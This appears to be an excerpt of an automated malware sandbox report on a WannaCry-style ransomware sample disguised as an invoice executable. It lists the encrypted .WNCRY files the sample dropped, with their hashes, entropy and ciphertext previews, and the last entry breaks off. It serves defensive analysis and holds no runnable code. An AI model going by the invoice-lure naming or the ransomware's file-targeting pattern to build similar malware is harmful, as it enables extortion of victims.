                                                          Preview:WANACRY!....5.....ps.......n..P.n.l..r...=.......e.....2.-.s.8.T.N..... .H#...9......Ia...&.f...v,.zn*b.=......V.J;/E.AjM.j.:...9.%.........v('.......Z"...~)L.4.0....+...l.......i.............2.<d-.\.FyJ/.Nl....i.._I.....B...$..V........."p.G.r...5...\....................s.3.Z...@....w..........o..y......R......:..#y....W..\}..)k-..f.$.L...e.RC......X9.9D..pd..}...>O.k .kb.Qv,...v...s#.)/.S.q.r'...="Hs...N.E.u..Q..YET.&.B.!5.'.....".riD.LBYn*....)G..6....C. .^I..xf.....0Fw.4.I,.@.....?.*q.....h.B.h).M...O.%.#W.rpO..#.......2....v... .G.N...&.=Z..*EvB..AxoO.y..s@..j."Qp.L...G....#.|4.?i...s+...g..'..o._...h...6F..U.n..:..?...K.q._.........#Gr8..j...{qd.s5....y4.|Dl..:.@(..s.;.;'.......r......Xu....W^Xx.........]0.%.@.d../.X.g..9{;.M.=...E.F.s.i- `r#....2.i..@=.U:.b.9G...e..)V..T..ZG-.0d..L....#...uY..*......E....zA.......e1:.cc.....b.h7#.......f{..=..[<.=R.%..#.w*.....;[.....O.R.(VX..6..x.8Sm..xW...%RWr..9-TV0....Q&.$SYKt.h).9........KB.4.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569861128322.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105512
                                                          Entropy (8bit):7.9982277893415885
                                                          Encrypted:true
                                                          SSDEEP:1536:wVyNHZ8q+0WHve/0uQhMkBYHZdujtXtA+vnYBtiC/oVOeZmk/nnaLEXZsiW5BMP5:fNHWe+vFakiWjtSonCsVOcaOZsiWAP5
                                                          MD5:386070492FB52AB7BFC7791439BFAABD
                                                          SHA1:7DC561EB387959F81B0A86D1EECDF501C955AE20
                                                          SHA-256:181F766235DA8FDC3404F942A839605FA53E2883C6D26B93AB9956780D7AAE01
                                                          SHA-512:DA0691C78515BDB80D64D77273D7FCD5042D37EBB5E6F545457F53CE1F8832F132504B984B2DBBCCA9EFBF161EDD4905B9674ED70BA4D22EAA0A6A4DEB5DA382
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(.....?.k[x-..K.-.9@...Np..T....+.~.*..c.7....@.5..<.1..)E6Yb..S..p.....3>].~....uO.).>/.........j.,Q....;.X.I.t... ....t.n.!.....-..%os..@SNO~..P.:.L..E......q\,9...R(p......%.K...oL....p.5.....i..>0.........8X..)"...fz.,./rfG.I8.R.68...."Y&.............6u...A.w.Qf.....Q..xH..p].+.2._a=w].....O.........]C.....lb0....F..Y].;...0.\.x....!.T6.....2.pt..F............i.u/.;...m}....;.M..{....D-L8..E.."sl..f...n.V.={.%q.O........{.Y7}\...........l.G.l.5.......Z.d.x......`Dn.J.d...d.u.!m.B....0X.5..YbJz..y.....k...Q`.nBZ.....4.j. .e......sS!.E....A.b.+.[..\?.........{.C..S...g..I.o|.Q......W......x..(....w.de...F.x...r...%c....fz?+i....:l..'...2k..I..q...Q.Y2...SrKr5%,}~P.|.........L..J..X..3J8.\.x&..A..E.o.K.N....#...N.?.$3.....m"C....R.....k7..k.:.(...dL.xl.~h.?.2CT..H.,..vC....z..E.....N..?.j.l.!.C.!....|..[.~...).Q.-m....-(..f.........Id..V.~N..S.)x. ..I...S.(iT.......V...DN./t...T....<....Q....$...$y....U..gH]4.m....z.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410569861128322.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105512
                                                          Entropy (8bit):7.9982277893415885
                                                          Encrypted:true
                                                          SSDEEP:1536:wVyNHZ8q+0WHve/0uQhMkBYHZdujtXtA+vnYBtiC/oVOeZmk/nnaLEXZsiW5BMP5:fNHWe+vFakiWjtSonCsVOcaOZsiWAP5
                                                          MD5:386070492FB52AB7BFC7791439BFAABD
                                                          SHA1:7DC561EB387959F81B0A86D1EECDF501C955AE20
                                                          SHA-256:181F766235DA8FDC3404F942A839605FA53E2883C6D26B93AB9956780D7AAE01
                                                          SHA-512:DA0691C78515BDB80D64D77273D7FCD5042D37EBB5E6F545457F53CE1F8832F132504B984B2DBBCCA9EFBF161EDD4905B9674ED70BA4D22EAA0A6A4DEB5DA382
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(.....?.k[x-..K.-.9@...Np..T....+.~.*..c.7....@.5..<.1..)E6Yb..S..p.....3>].~....uO.).>/.........j.,Q....;.X.I.t... ....t.n.!.....-..%os..@SNO~..P.:.L..E......q\,9...R(p......%.K...oL....p.5.....i..>0.........8X..)"...fz.,./rfG.I8.R.68...."Y&.............6u...A.w.Qf.....Q..xH..p].+.2._a=w].....O.........]C.....lb0....F..Y].;...0.\.x....!.T6.....2.pt..F............i.u/.;...m}....;.M..{....D-L8..E.."sl..f...n.V.={.%q.O........{.Y7}\...........l.G.l.5.......Z.d.x......`Dn.J.d...d.u.!m.B....0X.5..YbJz..y.....k...Q`.nBZ.....4.j. .e......sS!.E....A.b.+.[..\?.........{.C..S...g..I.o|.Q......W......x..(....w.de...F.x...r...%c....fz?+i....:l..'...2k..I..q...Q.Y2...SrKr5%,}~P.|.........L..J..X..3J8.\.x&..A..E.o.K.N....#...N.?.$3.....m"C....R.....k7..k.:.(...dL.xl.~h.?.2CT..H.,..vC....z..E.....N..?.j.l.!.C.!....|..[.~...).Q.-m....-(..f.........Id..V.~N..S.)x. ..I...S.(iT.......V...DN./t...T....<....Q....$...$y....U..gH]4.m....z.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410576842135818.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.998675342116442
                                                          Encrypted:true
                                                          SSDEEP:3072:fPAwIzzvg8nZ+oBG5KaNEuIWX5pHQsgLDV0JnS:Mjhn8oBsRm9Ahm504
                                                          MD5:0D284094F80F6FD6E785875729BA2B01
                                                          SHA1:A86C3EAC6C27CE482C04A61E6AED3FFD1F30584B
                                                          SHA-256:28ADB21386D48AAAA6FB2336858648B267782A97B591FF5539E6E12F4DE7C3F2
                                                          SHA-512:F98F9253FC8E2E4AE03652CA92D086BEAB40A50A3F1A364E5F9BA2800F926610F11D92C74B9D12075345B982385141BD8CA85E15778F338875DF646D83D1CD01
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."`....4f...0[..(K..?..4....O.lw......y......c.Es..Dq.6...pT..}.|.....Yp..m1H..e.YN.G&9c\.!rqshZ.3..BfL"..X.e.....<*......9..x+....y...Df.U3'".2....E......h2z...._n.<.uK....B.s...G..._6V..}#.N.'..J..}V0./.....r..9u...<:{.....s.........~....n.F..............`.8.g..<..(kG..V.iZ...U....T...E(.Y~n..D...X-...uVY.....39Y*..u.......T[b>_a..!JQ..5^..i..X]...R.e..D.......,.........0.Yd...a.(`.....#N.(.O....2y....g...[aw..4.....G.+....T(..N..h.*`|,.;LV.."w4...B....dT.M.....(.b... .#w........[;.qN..$5A...M.Z..|..=.q|nCM..........._....&.f.?.....g.X.{._f%.&6.n.....239.|..aT.... ...&)..a.{2Zqi..`.. s.....q..h8....6.6.d.3.$.9....(./|O...O9.....Ui..J..aM.z.......b8.a+c...K...'O,S..-=.@....@.....^...s"V>..Le..[.NI.!$.,......N].HUN.|...|6.>.x.,....WX.....F....M...l.g....\a......W2.Y...e.~/.J......G..qe.R...7...BJ.".N.b..Ge.2d.*>Xl.u.....$4...6m=.....z.).f.?.i.,.1....X.Iv.S..........+r.....<&..q..27c..p............q..W.N...s..A...K.4.e....&....X

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410576842135818.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.998675342116442
                                                          Encrypted:true
                                                          SSDEEP:3072:fPAwIzzvg8nZ+oBG5KaNEuIWX5pHQsgLDV0JnS:Mjhn8oBsRm9Ahm504
                                                          MD5:0D284094F80F6FD6E785875729BA2B01
                                                          SHA1:A86C3EAC6C27CE482C04A61E6AED3FFD1F30584B
                                                          SHA-256:28ADB21386D48AAAA6FB2336858648B267782A97B591FF5539E6E12F4DE7C3F2
                                                          SHA-512:F98F9253FC8E2E4AE03652CA92D086BEAB40A50A3F1A364E5F9BA2800F926610F11D92C74B9D12075345B982385141BD8CA85E15778F338875DF646D83D1CD01
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!...."`....4f...0[..(K..?..4....O.lw......y......c.Es..Dq.6...pT..}.|.....Yp..m1H..e.YN.G&9c\.!rqshZ.3..BfL"..X.e.....<*......9..x+....y...Df.U3'".2....E......h2z...._n.<.uK....B.s...G..._6V..}#.N.'..J..}V0./.....r..9u...<:{.....s.........~....n.F..............`.8.g..<..(kG..V.iZ...U....T...E(.Y~n..D...X-...uVY.....39Y*..u.......T[b>_a..!JQ..5^..i..X]...R.e..D.......,.........0.Yd...a.(`.....#N.(.O....2y....g...[aw..4.....G.+....T(..N..h.*`|,.;LV.."w4...B....dT.M.....(.b... .#w........[;.qN..$5A...M.Z..|..=.q|nCM..........._....&.f.?.....g.X.{._f%.&6.n.....239.|..aT.... ...&)..a.{2Zqi..`.. s.....q..h8....6.6.d.3.$.9....(./|O...O9.....Ui..J..aM.z.......b8.a+c...K...'O,S..-=.@....@.....^...s"V>..Le..[.NI.!$.,......N].HUN.|...|6.>.x.,....WX.....F....M...l.g....\a......W2.Y...e.~/.J......G..qe.R...7...BJ.".N.b..Ge.2d.*>Xl.u.....$4...6m=.....z.).f.?.i.,.1....X.Iv.S..........+r.....<&..q..27c..p............q..W.N...s..A...K.4.e....&....X

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577537420123.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.9985336085695735
                                                          Encrypted:true
                                                          SSDEEP:3072:AIYdL16V96dT3c3deokj18vsG3ImLMbjb2zTY7ho:A3dLM2dT3cteVHmGjb2T6ho
                                                          MD5:CDF09BC152D556CBDB495AB819EADFC6
                                                          SHA1:67AA7AEAB9F1D67472A8D6B7E94CC93466CEBBD7
                                                          SHA-256:0DCC3CAA7B32619C4C9E76E036AF9195B1E2DD2D5FE6EEB9308E82AC33459633
                                                          SHA-512:99836ECD7212C0980A362327B3A8E41DCB0B2DED43F9E798A6730507206C21866B95B43152FB1CB6D7ACB33B714B92DC841E798D5BA26AE09446FFB280DC0A58
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........4....>.....A......1c ...+..8..k.....e......h"_...M..8...B.lP..QI.Mr.YW".0[}..]...b.%......|....G..X@.8.||.V...X....x.d$.d0...rLn....e.q|.y-....bZ...,.].B..X].%.}...M$...[...2..A..k.s..7......X.K..,...7.....^..!Lx...S...zTL...... .Q..uz{.R............m....1.n.....C....+."M....l.....-..R.|`pi....XP.M...f.#4..\...)....a..... G.B.<....=<..~.....>..-0C.=& .mg....}.4..H.v.O6....cW}..<x.8Q..1..w>S...].he.Ug..E1...9j..@T..3'F|..._.y..lJ.\0u..Li..........ZA.uBf k......*y....2....SS........r.$....n...[j&..n..Lj.?..qj.Hxe*./aJ,..G%r....P4.DT...9....;,...!.`.Sz..f......t..0iZ|....}R3}...P...:o]..v.@A....)s....U...e.|........p..........FcR....s+...H.[z.$Tg....hn.4f....S....6..'...=&m...{&\.![...g5.....^.+.E.+.b.o..9....l5.....&.t.vR6.c...+.Zo.N..{......$F.A.8....:..Bi...Z...HLP>.n.4.<.9...g..........4x2.`..d....0U.q..(..8...7...q.7.TQ....J(@g....`.38..M*.\.i.....z.sf"..Ruj.$..X..i..t....A.t.K..1..a............cyW*m.3'Q-./hdU.^B...D..g..L..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577537420123.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.9985336085695735
                                                          Encrypted:true
                                                          SSDEEP:3072:AIYdL16V96dT3c3deokj18vsG3ImLMbjb2zTY7ho:A3dLM2dT3cteVHmGjb2T6ho
                                                          MD5:CDF09BC152D556CBDB495AB819EADFC6
                                                          SHA1:67AA7AEAB9F1D67472A8D6B7E94CC93466CEBBD7
                                                          SHA-256:0DCC3CAA7B32619C4C9E76E036AF9195B1E2DD2D5FE6EEB9308E82AC33459633
                                                          SHA-512:99836ECD7212C0980A362327B3A8E41DCB0B2DED43F9E798A6730507206C21866B95B43152FB1CB6D7ACB33B714B92DC841E798D5BA26AE09446FFB280DC0A58
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........4....>.....A......1c ...+..8..k.....e......h"_...M..8...B.lP..QI.Mr.YW".0[}..]...b.%......|....G..X@.8.||.V...X....x.d$.d0...rLn....e.q|.y-....bZ...,.].B..X].%.}...M$...[...2..A..k.s..7......X.K..,...7.....^..!Lx...S...zTL...... .Q..uz{.R............m....1.n.....C....+."M....l.....-..R.|`pi....XP.M...f.#4..\...)....a..... G.B.<....=<..~.....>..-0C.=& .mg....}.4..H.v.O6....cW}..<x.8Q..1..w>S...].he.Ug..E1...9j..@T..3'F|..._.y..lJ.\0u..Li..........ZA.uBf k......*y....2....SS........r.$....n...[j&..n..Lj.?..qj.Hxe*./aJ,..G%r....P4.DT...9....;,...!.`.Sz..f......t..0iZ|....}R3}...P...:o]..v.@A....)s....U...e.|........p..........FcR....s+...H.[z.$Tg....hn.4f....S....6..'...=&m...{&\.![...g5.....^.+.E.+.b.o..9....l5.....&.t.vR6.c...+.Zo.N..{......$F.A.8....:..Bi...Z...HLP>.n.4.<.9...g..........4x2.`..d....0U.q..(..8...7...q.7.TQ....J(@g....`.38..M*.\.i.....z.sf"..Ruj.$..X..i..t....A.t.K..1..a............cyW*m.3'Q-./hdU.^B...D..g..L..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577989149207.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.998434581862204
                                                          Encrypted:true
                                                          SSDEEP:3072:e8BQjqbYZrf7zBQuVDbGN0/HDMkZSf+Ep+yOLWFBq:JijuYZdvVDbGN0/Hfw+JKBq
                                                          MD5:F9084A1C4BBAC7BDC5356867D2E071C1
                                                          SHA1:D6D2AF7541FC7D157B67ACEA6EBC6ACC1DBCDDDC
                                                          SHA-256:61305597C669F76CCBBBB5F48C9576C520EF7A88F887489A3F425E0090E38D31
                                                          SHA-512:7FA486E9072C5FF2A5AA30E6042BE966AED7630D10551C8DB8F795E8934634E06882E9DD508941A20741F0E2FF1625374664CD13393F718086B9BD6A615D585F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.............D...(...o.L..M=.H^".../Q..+....M.=...B......).m6....*...........b3....m/e2...|1....848.....7c.;.. PS?yO[VR.[..B}.b...NN..za.)...rX.?..r.s.(.I....Kn'.4._.8.....NA.......N_.k...>.j...@..j.....r...y{...^.4.J....{f|..Z.K+......4#w..LHJ.\...............%.."P.o.go.i3......^7.....r............gy..QWB..m_~bb[F......(..u[..n..?.;.G.%........S`8].....E....M~..,r.....m.l.....F...\s.QF...9VQ........1.d..$..).\......L....>.t......8U...g14.d.P..1mYw.=.M.vL%..c..... ...:\..G....6p<....@.v....R......6RM6...P.....[.7.4.T;.j]...]Xa.C).g.....d.../zz...rg..0cqw.%.`?r.....C1....OX.}.+D.y.O..(M..Q.`..~...>v.y......wu..$.h...(.g.&l.....M4....j.;.].-Q....dN..oDB.Y......y.e..A.e......x.h....-.......L..!..Z=....2dL..dO....m.v..T..5.."..>.h..jra.g.C'......\.I.[....ze......4..X..s".u...5...2.q.3jv[{...../ZBIODX...$9....>=.-p.$.b.v..hp.UF...\u...{)QNO)w{4..-....t.'....qZ..../....}E.M.};.......=lb...0..o.....".E...St......!nF0.../\..t...<...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410577989149207.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118520
                                                          Entropy (8bit):7.998434581862204
                                                          Encrypted:true
                                                          SSDEEP:3072:e8BQjqbYZrf7zBQuVDbGN0/HDMkZSf+Ep+yOLWFBq:JijuYZdvVDbGN0/Hfw+JKBq
                                                          MD5:F9084A1C4BBAC7BDC5356867D2E071C1
                                                          SHA1:D6D2AF7541FC7D157B67ACEA6EBC6ACC1DBCDDDC
                                                          SHA-256:61305597C669F76CCBBBB5F48C9576C520EF7A88F887489A3F425E0090E38D31
                                                          SHA-512:7FA486E9072C5FF2A5AA30E6042BE966AED7630D10551C8DB8F795E8934634E06882E9DD508941A20741F0E2FF1625374664CD13393F718086B9BD6A615D585F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.............D...(...o.L..M=.H^".../Q..+....M.=...B......).m6....*...........b3....m/e2...|1....848.....7c.;.. PS?yO[VR.[..B}.b...NN..za.)...rX.?..r.s.(.I....Kn'.4._.8.....NA.......N_.k...>.j...@..j.....r...y{...^.4.J....{f|..Z.K+......4#w..LHJ.\...............%.."P.o.go.i3......^7.....r............gy..QWB..m_~bb[F......(..u[..n..?.;.G.%........S`8].....E....M~..,r.....m.l.....F...\s.QF...9VQ........1.d..$..).\......L....>.t......8U...g14.d.P..1mYw.=.M.vL%..c..... ...:\..G....6p<....@.v....R......6RM6...P.....[.7.4.T;.j]...]Xa.C).g.....d.../zz...rg..0cqw.%.`?r.....C1....OX.}.+D.y.O..(M..Q.`..~...>v.y......wu..$.h...(.g.&l.....M4....j.;.].-Q....dN..oDB.Y......y.e..A.e......x.h....-.......L..!..Z=....2dL..dO....m.v..T..5.."..>.h..jra.g.C'......\.I.[....ze......4..X..s".u...5...2.q.3jv[{...../ZBIODX...$9....>=.-p.$.b.v..hp.UF...\u...{)QNO)w{4..-....t.'....qZ..../....}E.M.};.......=lb...0..o.....".E...St......!nF0.../\..t...<...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578287710703.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118648
                                                          Entropy (8bit):7.998174869240827
                                                          Encrypted:true
                                                          SSDEEP:1536:DrJMdhvcNblejyEh5myoIV1eIW/OGAKo5AJiIsfTVpvKmJqwr0mpr8si69jmqqvO:DNMdlctsh5v6VAKaAbsfRp9Brpyb+F
                                                          MD5:63FA49777C6AE988D58343801CAD45E6
                                                          SHA1:D4D642148E0B47A0C336412E1DF7D1888758E62E
                                                          SHA-256:42769962214C0E91ABA4776D8770BA441F7A95D3ED68A6CD06606A1975B9007D
                                                          SHA-512:D8DC6BA1B7B2A1653E5658EACA6AD9C6E43CEC4524AAB279D3D9F6B8502B427A91B441F68B8775DAEA455C9635437E37860E93EA2F3D7EC41F75CB0F748F0BF8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....p.R.V.....{l.gn,.c[...%nI.i...t4...&`...S.).!......#....t\Ss.fZ.3ea1......]..U.......6.....D.R..7...\`...Q....@P2.(..2!N...l.;kw....m.Iq...m|.fxL.WB .&Z...h.G`.....=$-CQ.%..._t.n9n.h<..)..u.;7Q......3.^J...\....+.T..l...k.,.......5.v/.G.....^....Z.........[..S?....v..3D.]..C.....!...a.K.{...R...L........lv^...E.<.]<.3..?u..c`,T...{.j..z......5.y.S./;.n%.9^SI_R.c....{..'M@....0....<.N.(%..e.m4s.d.z.....&..j,.8...e...r....[....h...&..............*RaQWH.mTg..g..be0..TC..W......0.I.9...q?.....x{..;!..] 4..s...R\...O*......w..n......D.*.H..]..0.Q..V.cX...q.(T..5..z.'...It.....]...^V#.+..|...~.a;....y..l_#.Qn[..O.B+.E...R.....}...so..x..p.|.v^v......'<.p..v.w..Leli..Ybf;U.O...hUc{o>.._....:-f.@....0~...p....|.*.....w~V$".`..,.$.E`HD......xfT~7...j...."..\{.S{.D...E.....!........Z.o. .. .n..tM..i.....3I.......w}.DY........f...J..9F...B.Y......y.J.X...8.iw....i...1.{...tK...<H...E\C.4..I..XT.Y.^.a.B.[..A5.....F.0.O2{2z^})bP...F.Z..P(o.]

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578287710703.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118648
                                                          Entropy (8bit):7.998174869240827
                                                          Encrypted:true
                                                          SSDEEP:1536:DrJMdhvcNblejyEh5myoIV1eIW/OGAKo5AJiIsfTVpvKmJqwr0mpr8si69jmqqvO:DNMdlctsh5v6VAKaAbsfRp9Brpyb+F
                                                          MD5:63FA49777C6AE988D58343801CAD45E6
                                                          SHA1:D4D642148E0B47A0C336412E1DF7D1888758E62E
                                                          SHA-256:42769962214C0E91ABA4776D8770BA441F7A95D3ED68A6CD06606A1975B9007D
                                                          SHA-512:D8DC6BA1B7B2A1653E5658EACA6AD9C6E43CEC4524AAB279D3D9F6B8502B427A91B441F68B8775DAEA455C9635437E37860E93EA2F3D7EC41F75CB0F748F0BF8
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....p.R.V.....{l.gn,.c[...%nI.i...t4...&`...S.).!......#....t\Ss.fZ.3ea1......]..U.......6.....D.R..7...\`...Q....@P2.(..2!N...l.;kw....m.Iq...m|.fxL.WB .&Z...h.G`.....=$-CQ.%..._t.n9n.h<..)..u.;7Q......3.^J...\....+.T..l...k.,.......5.v/.G.....^....Z.........[..S?....v..3D.]..C.....!...a.K.{...R...L........lv^...E.<.]<.3..?u..c`,T...{.j..z......5.y.S./;.n%.9^SI_R.c....{..'M@....0....<.N.(%..e.m4s.d.z.....&..j,.8...e...r....[....h...&..............*RaQWH.mTg..g..be0..TC..W......0.I.9...q?.....x{..;!..] 4..s...R\...O*......w..n......D.*.H..]..0.Q..V.cX...q.(T..5..z.'...It.....]...^V#.+..|...~.a;....y..l_#.Qn[..O.B+.E...R.....}...so..x..p.|.v^v......'<.p..v.w..Leli..Ybf;U.O...hUc{o>.._....:-f.@....0~...p....|.*.....w~V$".`..,.$.E`HD......xfT~7...j...."..\{.S{.D...E.....!........Z.o. .. .n..tM..i.....3I.......w}.DY........f...J..9F...B.Y......y.J.X...8.iw....i...1.{...tK...<H...E\C.4..I..XT.Y.^.a.B.[..A5.....F.0.O2{2z^})bP...F.Z..P(o.]

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578912835438.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118648
                                                          Entropy (8bit):7.998434669295102
                                                          Encrypted:true
                                                          SSDEEP:3072:8r1gTVkUCvWrCAcODktAD8fQXlBu46ioLm3Ph0ke:+sVZ4uQ6b76iP3ZHe
                                                          MD5:2EDAD16F3E84E9C31F980A3CF5B14BCD
                                                          SHA1:5E1A00482BB531068D9E4CDA4D124B9DDA7A48E8
                                                          SHA-256:D0526DBD114101A2C7CC886F20F27DA66672950F838E873B4FB3CF76DACC2FDE
                                                          SHA-512:9CE66F2DEED210018A4C13CD6CA869F6620FB25923CFEB5A57583A041CBF27E0EA228041AC733BCE742CDB45E43B4B73B1DA39D132455C16E9587975BC0E1A09
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....sa....W...$..I:...rR.wm.O..D7..TI..{.c|.B...{?.E...Q.B.<.9...p..e...j.W..5.f...T..:.?.:k.f..!.....a..x*.H.\.p&X.v....f..$.....i_,t.....3_........ .6.s.DE.S.Cn#.z.EE...s..._..pB..`..........<..Rd=....m...,.&.ok... ..(}.1..".a..a.....{...&:.g....Z............$...pC....f.H.....E..<1.mB $;.Y..4|....J.......o]V.,.....<.P..U..1...o...K.....O..~...S...M......`..E ..k7..T..c,$o..f....P../~.N..8x_. ........ES.....x.....;i..=..)auO...\.u.T....T.Q ...k..:..]5.....\ON..V2#_.Ix....lF.i.y).,..h..y.X<...7l.v...1=V.Ht%v=..c.C...~37...1oFp......B|.K....([.kw.W.l...h.o..-..DdL5'...A/.<..J.>...?..s...&.z.rl.i...eX..`w.V...I..L....n%.P...'..?9qs.T..](.D...a..#;.I.2.........UK...{..+.a............".t.r..i...I.~hk[y......m.vd...S.(..S.u.H.n$.e.i.z.R.M...IB.=a.g7W.r.#7..H>}4......E............| ......[..+....S.@S.r.z{....x.;..p..&......".....-..[.&@.7J=.!.%Z.o.4.&..}*Sa+..e-2@...W.<.|DJ........ZJ..HS...5"t.......f...d...T.X:..R...U_....^..r...i*

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410578912835438.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):118648
                                                          Entropy (8bit):7.998434669295102
                                                          Encrypted:true
                                                          SSDEEP:3072:8r1gTVkUCvWrCAcODktAD8fQXlBu46ioLm3Ph0ke:+sVZ4uQ6b76iP3ZHe
                                                          MD5:2EDAD16F3E84E9C31F980A3CF5B14BCD
                                                          SHA1:5E1A00482BB531068D9E4CDA4D124B9DDA7A48E8
                                                          SHA-256:D0526DBD114101A2C7CC886F20F27DA66672950F838E873B4FB3CF76DACC2FDE
                                                          SHA-512:9CE66F2DEED210018A4C13CD6CA869F6620FB25923CFEB5A57583A041CBF27E0EA228041AC733BCE742CDB45E43B4B73B1DA39D132455C16E9587975BC0E1A09
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....sa....W...$..I:...rR.wm.O..D7..TI..{.c|.B...{?.E...Q.B.<.9...p..e...j.W..5.f...T..:.?.:k.f..!.....a..x*.H.\.p&X.v....f..$.....i_,t.....3_........ .6.s.DE.S.Cn#.z.EE...s..._..pB..`..........<..Rd=....m...,.&.ok... ..(}.1..".a..a.....{...&:.g....Z............$...pC....f.H.....E..<1.mB $;.Y..4|....J.......o]V.,.....<.P..U..1...o...K.....O..~...S...M......`..E ..k7..T..c,$o..f....P../~.N..8x_. ........ES.....x.....;i..=..)auO...\.u.T....T.Q ...k..:..]5.....\ON..V2#_.Ix....lF.i.y).,..h..y.X<...7l.v...1=V.Ht%v=..c.C...~37...1oFp......B|.K....([.kw.W.l...h.o..-..DdL5'...A/.<..J.>...?..s...&.z.rl.i...eX..`w.V...I..L....n%.P...'..?9qs.T..](.D...a..#;.I.2.........UK...{..+.a............".t.r..i...I.~hk[y......m.vd...S.(..S.u.H.n$.e.i.z.R.M...IB.=a.g7W.r.#7..H>}4......E............| ......[..+....S.@S.r.z{....x.;..p..&......".....-..[.&@.7J=.!.%Z.o.4.&..}*Sa+..e-2@...W.<.|DJ........ZJ..HS...5"t.......f...d...T.X:..R...U_....^..r...i*

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133410582733672226.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):117512
                                                          Entropy (8bit):7.998242002676668
                                                          Encrypted:true
                                                          SSDEEP:1536:oCc4gQymCR8SgjMBFNxXf8BYvjuvPMd5f0JLLw4+Gdi0kI5tL5nQMZfrM9+wcOco:o1riCR9B3xi6qvP0eJXx9vQ4fsyhUCcv
                                                          MD5:E5C9ED9AC03DF4A7F55E61B4335E4A55
                                                          SHA1:C9A1C61BD2D550848E2DFFEE419C41569CE6A78E
